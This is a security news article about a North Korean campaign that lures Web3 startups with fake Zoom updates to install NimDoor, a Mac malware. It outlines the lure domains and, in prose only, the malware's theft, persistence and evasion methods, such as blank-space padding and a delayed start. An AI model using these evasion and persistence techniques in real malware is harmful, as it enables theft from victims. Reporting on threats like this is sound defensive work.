North Korean Hackers Use Fake Zoom Invites to Target Web3 Startups with NimDoor Malware

North Korean hackers have launched a sophisticated cyber-espionage campaign aimed at Web3 and cryptocurrency startups, deploying a new Mac-focused malware called NimDoor. According to SentinelLabs, the attackers use a combination of advanced programming tactics and social engineering to infiltrate systems and steal sensitive data.

Fake Zoom Meeting Updates Used as Lure

The attack begins when hackers impersonate trusted contacts on Telegram, asking targets to arrange meetings via Calendly. Victims then receive phishing emails disguised as Zoom update notifications, which include spoofed meeting links. These emails lead users to download files from domains made to mimic legitimate Zoom URLs, such as support.us05web-zoom.forum and support.us05web-zoom.cloud.

The malware installer—named with subtle typos like "Zook SDK Update" instead of "Zoom SDK Update"—includes tens of thousands of lines of blank space to conceal its malicious intent. Within this bloated script, just a few lines of code initiate the actual infection by downloading and executing further payloads from attacker-controlled servers.

Once activated, the malware opens a real Zoom redirect page alongside a deceptive HTML file to make the process appear authentic, all while launching its attack in the background.

NimDoor Malware Capabilities

NimDoor operates through two main functions once it infects a Mac:

1. Data Theft: It harvests personal data including passwords, browsing history, and login credentials from browsers such as Chrome, Firefox, Edge, Brave, and Arc. It also accesses system keychains and command history logs.

2. Telegram Targeting: A specialized component extracts encrypted Telegram chat databases and corresponding decryption keys, allowing attackers to read private messages offline.

All stolen data is temporarily stored in hidden folders with names mimicking legitimate system files, before being exfiltrated via encrypted connections to attacker-controlled servers.

Advanced Stealth and Persistence

NimDoor is written in Nim and C++, languages that often evade traditional antivirus detection. It communicates with command-and-control servers through encrypted channels and uses deceptive filenames and locations to remain undetected.

Persistence is a key focus of this malware. It monitors user attempts to remove it and responds by reinstalling itself from hidden backups. It disguises itself using slightly misspelled system-related file names and ensures it launches automatically at system startup.

A lightweight component checks in with attacker servers every 30 seconds to report activity and receive new commands, all while mimicking legitimate web traffic. A built-in 10-minute delay before full activation helps it avoid being flagged by security tools scanning for immediate threats.

These techniques make NimDoor exceptionally difficult for typical users to detect or remove without expert intervention. The campaign's scale and complexity suggest it's part of a broader, ongoing operation targeting multiple victims with tailored phishing domains.

-